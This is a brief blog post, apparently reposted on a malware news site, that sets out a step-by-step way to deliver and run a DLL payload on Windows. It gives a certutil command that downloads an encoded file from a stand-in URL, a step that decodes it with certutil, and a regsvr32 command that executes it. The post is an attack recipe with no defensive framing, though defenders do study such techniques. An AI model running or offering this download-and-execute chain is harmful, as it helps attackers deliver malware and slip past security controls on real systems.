Certutil for delivery of files

Malware News
1

Quick post putting together some twitter awesomeness

references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let’s do it

1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down






4. Base64decode the file with certutil


5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll


Article Link: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html